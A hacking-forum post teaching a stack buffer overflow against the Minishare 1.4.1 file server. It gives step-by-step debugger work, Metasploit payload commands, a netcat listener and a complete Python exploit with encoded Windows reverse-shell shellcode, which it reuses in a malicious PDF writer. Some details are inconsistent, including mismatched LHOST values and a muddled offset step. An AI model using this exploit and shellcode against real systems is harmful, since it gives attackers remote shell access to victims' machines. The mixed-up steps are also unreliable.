Jump to content

Welcome to NulledBlog
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!
Photo

Antagonism | Buffer Overflow Tutorial

Antagonism Buffer Overflow Tutorial

  • Please log in to reply
No replies to this topic

#1
TimeCenter

  • Offline
  • Hack The Time :D

  • Posts:
    79
    Reputation:
    5
    Joined:
    08 Jul, 2016

 M7IbPvb.jpg

Imagine a glass of wine. You're thirsty and you want to drink it, but first you need to fill your glass. You keep pouring it into the glass, but at one point, the wine will have filled the glass and it will leak outside of it, on your carpet. This is exactly what buffer overflow is. It happens when a program or file writes data to a buffer and overflows it. It leaks into adjacent memory and overrides it. That way we get our malicious part to execute.

To understand Buffer Overflows, one must first understand buffers, stack, EIP & ESP registers.

Buffer

Buffer is  region of a memory that is used to temporarily hold data while it is being used or moved.

Stack

A stack is a specialized type of buffer which is used to store data. It stores it from the top to down. This means that as new requests enter it, they get stored on top, and they push everything else down. Stacks are used to pass data to various functions, and also as a space holders of variables. PUSH stores data and POP removes it.

ESP Register

If we wanted to access the stack memory we could you can use ESP. ESP is a stack pointer. It points at the top of the stack.

EIP Register


EIP Register is instruction pointer. Since code execution is not linear, we can call functions and skip parts of the code, we can use EIP and point it to the address that contains code that we want to execute next. Whatever EIP points to will be executed next.

Now that we've got that done, we can discuss tools that are required for exploitation. We will be using:

  • Metasploit Framework
  • Netcat for a listener
  • OllyDbg
  • Vulnerable Application


In this tutorial, I will be showing how to exploit Minishare 1.4.1. Please note that an exploit for this already exists and that we will be merely reconstructing the exploit from scratch. I am not his original creator. You can find original creator on ExploitDB.

Getting Ready

First thing we need to do is get the file ready for analysis. Download Minishare from link I provided above and install it. Download ollydbg and extract it. Since it doesn't need any installation just double click the file and it will run. Now, in OllyDbg open the file and get it ready for analysis. Do this by navigating to File>Open and then select path to your file.


File>Open


 ChNo1my.png

Now simply click open and that's it. Now, you are interested in:
 

  • CPU Window
  • Registry Window


 xYOGtx3.png
 

Even though we opened the file in OllyDbg it's still not executed. To run it, press F9 or just click on start button located at the top of ollydbg. This will run your file, and you will see this on your screen:

 QtMgNwu.png

Awesome. Now let's say a word or two about Networking.

Networking

We will be using Python to trigger and exploit the vulnerability for by using the socket module we can connect to the remote machine running the vulnerable application and send data to it. I highly recommend learning Python before doing any of this, because you won't understand it.

To import a module in Python, we use import command. Next, we have to connect to the remote machine on port 80 because that is the port the application is using. We can then send data to it in hope of causing a crash. In this case, we can accomplish it by sending overly large HTTP GET requests. They begin with GET and end with HTTP/1.1 and line breaks. Let's write our Python file. Open any text editor. Remember when you were a skid and people used to tell you that you can't hack with notepad? Today you can laugh at them because notepad is what we will use to write our python script. So technically, in a way, you hacked with notepad. How cool is that?


import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "\x41"*2000 + " HTTP/1.1\r\n\r\n"
soc.send(buf)
soc.close()


So what are we doing? We are sending a huge HTTP GET request that consists of a lot of "A" characters. "\x41" is the hexadecimal value of the ASCII "A" character, and "\r\n" is just a new line carriage return. We send two thousand "A" characters in hope of creating an error. And we did. At the very bottom of OllyDbg, we got access violation.

 4iPHm5W.png
 

Also, we can see that EIP was overwritten:

 gVVXz0R.png
 

Taking Control


By causing an error we have just scratched the surface of Buffer Overflows because we have to find a way to tame the error and use it as we please. To do so, we want to find the opcode for JMP ESP.

Click on View menu in Olly and then select Executable Modules option. It will show us a new window containing all loaded executable modules. We can see minishare.exe and a lot of DLLs that it uses.

 WrRO01c.png
 

Select shell32.dll and click enter. However keep in mind when choosing that address of JMP ESP mustn't have null bytes so you must choose carefully. If it did have them, when we override EIP it would act as EOL (End of line) and it would stop our exploit from running. So make sure you don't choose anything that has \x00, \x0a or \x0d. Opening shell32.dll would present it in our CPU window. Now you want to press Control + F. This will prompt us for commands search. In it, type "JMP ESP" and press enter. Take note of the address on the left. It's 7C A5 82 65 in my case.

 D2OquTI.png

Now, you want to restart the program by going on Debug>Restart. Press F9 again to re-run it. This is important step and you won't be able to try your exploit if you don't restart it.

Next thing we want to do is find exact position at which EIP is overwritten. We will take advantage of tools that ship with metasploit framework. Fire up your Backtrack machine and in console type:


ruby pattern_create.rb 2000


Replace 2000 with size that you want.

 sVZVm9o.png

That is what we want to send to the victim. Edit your python script to do so.


import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "That long nasty code in the picture above" + " HTTP/1.1\r\n\r\n"

soc.send(buf)
soc.close()


After sending it, EIP register and ESP register will change. You want to take value of EIP register and note it down. Do the same for ESP register.

 rkOjXTK.png

Now let's use offset_create tool to determine the exact size of the buffer that create the overflow.


ruby pattern_create (EIP value)
ruby pattern_offset (ESP value)


 l7mToY8.png
 

You will get two numbers. They will be fairly close to each other. First one is 1787 and other one is 1791. First one says that EBX is overwritten at 1787 bytes and second one that EIP is overwritten after 1791 bytes of data.

To show that this is in fact correct, I will demonstrate how EIP gets overridden after 1787 bytes of data. Everything before it is junk.


import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "\x41"*1787 + "\x42"*4 + " HTTP/1.1\r\n\r\n"

soc.send(buf)
soc.close()


This will override EIP to be 42424242. Save the script and re-run it. Don't forget to restart the program in OllyDbg as well!

 ADTu7uC.png

As you can see it worked. We can now go ahead and add shellcode.

Shellcode

First, we need to open backtrack console. We will be using Metasploit payload windows/shell_reverse_tcp. So let's do:


msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R


But you will notice that it will include x00, x0d and x0a. If you remember, these are line breakers. When they get in EIP registry they will terminate the line and exploit will fail. That's why we have to encode this so it doesn't have these. We do it with MSFencode.


msfpayload windows/shell_reverse_tcp LHOST=192.168.2.106 LPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c


 b2Y0iAI.png

Shellcode will be generated. Now let's take a look at our python script again. After 1787 bytes of data, we want to input JMP ESP which has language and OS details. Remember that I told you to take note of address? It was 7C A5 82 65. We need to use little endian order. This means that we have to allocate bytes from least significant to most significant. So our original 7C A5 82 65 will reverse to 65 82 A5 7C. And after this, we will add our shellcode. But it's always nice to have NOPs (No operations) for stability. I'll add thirty bytes of these.


import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "\x41"*1787
buf+="\x65\x82\xA5\x7C" #JMP ESP
buf+="\x90"*30 #NOPs
buf+=("\xb8\x94\xf9\xf4\xb9\xdb\xdc\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x4f\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x76\x0c\x08\x51\xff"
"\xef\xf1\xa2\x9f\x66\x14\x93\x8d\x1d\x5c\x86\x01\x55\x30\x2b"
"\xea\x3b\xa1\xb8\x9e\x93\xc6\x09\x14\xc2\xe9\x8a\x99\xca\xa6"
"\x49\xb8\xb6\xb4\x9d\x1a\x86\x76\xd0\x5b\xcf\x6b\x1b\x09\x98"
"\xe0\x8e\xbd\xad\xb5\x12\xbc\x61\xb2\x2b\xc6\x04\x05\xdf\x7c"
"\x06\x56\x70\x0b\x40\x4e\xfa\x53\x71\x6f\x2f\x80\x4d\x26\x44"
"\x72\x25\xb9\x8c\x4b\xc6\x8b\xf0\x07\xf9\x23\xfd\x56\x3d\x83"
"\x1e\x2d\x35\xf7\xa3\x35\x8e\x85\x7f\xb0\x13\x2d\x0b\x62\xf0"
"\xcf\xd8\xf4\x73\xc3\x95\x73\xdb\xc0\x28\x50\x57\xfc\xa1\x57"
"\xb8\x74\xf1\x73\x1c\xdc\xa1\x1a\x05\xb8\x04\x23\x55\x64\xf8"
"\x81\x1d\x87\xed\xb3\x7f\xc0\xc2\x89\x7f\x10\x4d\x9a\x0c\x22"
"\xd2\x30\x9b\x0e\x9b\x9e\x5c\x70\xb6\x66\xf2\x8f\x39\x96\xda"
"\x4b\x6d\xc6\x74\x7d\x0e\x8d\x84\x82\xdb\x01\xd5\x2c\xb4\xe1"
"\x85\x8c\x64\x89\xcf\x02\x5a\xa9\xef\xc8\xed\xee\x78\x33\x45"
"\xf2\x12\xdb\x94\xf2\xf3\x47\x10\x14\x99\x67\x74\x8f\x36\x11"
"\xdd\x5b\xa6\xde\xcb\xcb\x4b\x4c\x90\x0b\x05\x6d\x0f\x5c\x42"
"\x43\x46\x08\x7e\xfa\xf0\x2e\x83\x9a\x3b\xea\x58\x5f\xc5\xf3"
"\x2d\xdb\xe1\xe3\xeb\xe4\xad\x57\xa4\xb2\x7b\x01\x02\x6d\xca"
"\xfb\xdc\xc2\x84\x6b\x98\x28\x17\xed\xa5\x64\xe1\x11\x17\xd1"
"\xb4\x2e\x98\xb5\x30\x57\xc4\x25\xbe\x82\x4c\x55\xf5\x8e\xe5"
"\xfe\x50\x5b\xb4\x62\x63\xb6\xfb\x9a\xe0\x32\x84\x58\xf8\x37"
"\x81\x25\xbe\xa4\xfb\x36\x2b\xca\xa8\x37\x7e")

buf+=" HTTP/1.1\r\n\r\n"

soc.send(buf)
soc.close()


This is the final form of our exploit. Don't run it yet. You need to set up a listener that will listen for incoming connections and accept them. We will use netcat for listener this time. Open new backtrack console and type:


nc -nvlp 4444


Our local port is 4444. If your shellcode used something else, change it. You will have your session after running the exploit.

 RlgWtkr.png

Non socket exploits

What if you want to write an exploit similar to one in adobe reader?


buf = open("C:\buffer.pdf", "a")
data = "\x41"*2000
buf.write(data)
buf.close()


This will create a file in C drive called buffer.pdf and open it for appending. It will then write two thousand "A"s in it. What comes next is very similar to my previous example. Get exact number of bytes needed for EIP to be overwritten, JMP ESP & Shellcode.


buf = open("C:\buffer.pdf", "a")
data="\x41"*1787
data+="\x65\x82\xA5\x7C" #JMP ESP
data+="\x90"*30 #NOPs
data+=("\xb8\x94\xf9\xf4\xb9\xdb\xdc\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x4f\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x76\x0c\x08\x51\xff"
"\xef\xf1\xa2\x9f\x66\x14\x93\x8d\x1d\x5c\x86\x01\x55\x30\x2b"
"\xea\x3b\xa1\xb8\x9e\x93\xc6\x09\x14\xc2\xe9\x8a\x99\xca\xa6"
"\x49\xb8\xb6\xb4\x9d\x1a\x86\x76\xd0\x5b\xcf\x6b\x1b\x09\x98"
"\xe0\x8e\xbd\xad\xb5\x12\xbc\x61\xb2\x2b\xc6\x04\x05\xdf\x7c"
"\x06\x56\x70\x0b\x40\x4e\xfa\x53\x71\x6f\x2f\x80\x4d\x26\x44"
"\x72\x25\xb9\x8c\x4b\xc6\x8b\xf0\x07\xf9\x23\xfd\x56\x3d\x83"
"\x1e\x2d\x35\xf7\xa3\x35\x8e\x85\x7f\xb0\x13\x2d\x0b\x62\xf0"
"\xcf\xd8\xf4\x73\xc3\x95\x73\xdb\xc0\x28\x50\x57\xfc\xa1\x57"
"\xb8\x74\xf1\x73\x1c\xdc\xa1\x1a\x05\xb8\x04\x23\x55\x64\xf8"
"\x81\x1d\x87\xed\xb3\x7f\xc0\xc2\x89\x7f\x10\x4d\x9a\x0c\x22"
"\xd2\x30\x9b\x0e\x9b\x9e\x5c\x70\xb6\x66\xf2\x8f\x39\x96\xda"
"\x4b\x6d\xc6\x74\x7d\x0e\x8d\x84\x82\xdb\x01\xd5\x2c\xb4\xe1"
"\x85\x8c\x64\x89\xcf\x02\x5a\xa9\xef\xc8\xed\xee\x78\x33\x45"
"\xf2\x12\xdb\x94\xf2\xf3\x47\x10\x14\x99\x67\x74\x8f\x36\x11"
"\xdd\x5b\xa6\xde\xcb\xcb\x4b\x4c\x90\x0b\x05\x6d\x0f\x5c\x42"
"\x43\x46\x08\x7e\xfa\xf0\x2e\x83\x9a\x3b\xea\x58\x5f\xc5\xf3"
"\x2d\xdb\xe1\xe3\xeb\xe4\xad\x57\xa4\xb2\x7b\x01\x02\x6d\xca"
"\xfb\xdc\xc2\x84\x6b\x98\x28\x17\xed\xa5\x64\xe1\x11\x17\xd1"
"\xb4\x2e\x98\xb5\x30\x57\xc4\x25\xbe\x82\x4c\x55\xf5\x8e\xe5"
"\xfe\x50\x5b\xb4\x62\x63\xb6\xfb\x9a\xe0\x32\x84\x58\xf8\x37"
"\x81\x25\xbe\xa4\xfb\x36\x2b\xca\xa8\x37\x7e")

buf.write(data)
buf.close()


Please note that the code above was just a demonstration on how it should be made. The number of bytes that trigger the vulnerability are wrong and thus it won't work.



 


Edited by TimeCenter, 22 July 2016 - 10:32 AM.

  • 0



Also tagged with one or more of these keywords: Antagonism, Buffer, Overflow, Tutorial

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users